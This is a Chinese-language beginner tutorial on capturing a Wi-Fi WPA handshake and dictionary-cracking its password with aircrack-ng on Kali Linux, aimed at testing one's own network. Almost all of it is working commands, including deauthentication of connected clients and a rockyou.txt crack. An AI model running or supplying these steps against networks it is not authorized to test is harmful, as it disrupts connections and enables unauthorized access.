在 Kali Linux 中抓取 Wi-Fi 握手包并跑包(破解 Wi-Fi 密码),适合初学者入门学习用途。请你务必 只对你有授权的 Wi-Fi 网络操作,否则是违法的。
✅ 所需工具:
- Kali Linux(建议使用真实网卡或兼容的 USB Wi-Fi 网卡)
- 工具:
aircrack-ng套件 - 网卡支持 监听模式(monitor mode)
📋 操作步骤
1️⃣ 打开终端,查看无线网卡名称
sudo iwconfig
作用:查看无线网卡是否存在、是否支持 Monitor 模式,输出中常见网卡名如 wlan0。
2️⃣ 将网卡设置为监听模式(Monitor mode)
sudo airmon-ng start wlan0
⚠️ 把
wlan0替换成你实际的网卡名。
作用:将无线网卡切换成监听模式(抓包专用),启动后会变成 wlan0mon(或类似名字)。
3️⃣ 扫描周围的 Wi-Fi 网络
sudo airodump-ng wlan0mon
作用:用监听模式查看附近所有 Wi-Fi 的详细信息,包括:
- ESSID(Wi-Fi名称)
- BSSID(MAC地址)
- 信道(CH)
- 加密类型等
按下
Ctrl + C停止扫描。选定你要测试的目标(你家路由器)并记下:
- BSSID(如
00:11:22:33:44:55)- Channel 信道号(如 6)
4️⃣ 只监听一个目标 Wi-Fi,准备抓握手包
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w handshake wlan0mon
解释:
-c 6:信道号为 6(替换成目标的信道)--bssid:目标 Wi-Fi 的 MAC 地址-w handshake:保存文件为handshake.capwlan0mon:监听模式网卡
作用:只监听目标 Wi-Fi,等待客户端连接或重新连接,从而抓取握手包。
5️⃣ (可选)踢出已连接设备来强制重新握手
sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 wlan0mon
解释:
-0 5:发送 5 个 deauth(断开连接)包-a:目标路由器 BSSIDwlan0mon:监听网卡
作用:踢掉当前连接设备,促使它重新连接,从而产生握手包。
你可以同时开两个终端窗口,一个监听、一个踢人,直到抓到握手包。
6️⃣ 抓到握手包后,停止抓包并开始破解
sudo aircrack-ng -w 密码字典.txt -b 00:11:22:33:44:55 handshake-01.cap
解释:
-w 密码字典.txt:指定密码字典文件(你可以用 rockyou.txt 或自定义)-b:目标 Wi-Fi 的 BSSIDhandshake-01.cap:刚才保存的握手包文件
作用:使用字典攻击方式,跑包破解密码。
💡 字典在哪?
Kali 自带常用字典文件:
/usr/share/wordlists/rockyou.txt.gz
先解压:
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
✅ 总结命令流程:
iwconfig # 查看网卡名
airmon-ng start wlan0 # 开启监听模式
airodump-ng wlan0mon # 扫描 Wi-Fi
airodump-ng -c 6 --bssid 目标BSSID -w handshake wlan0mon # 监听目标抓包
aireplay-ng -0 5 -a 目标BSSID wlan0mon # 强制断线抓握手包
aircrack-ng -w rockyou.txt -b 目标BSSID handshake-01.cap # 破解密码
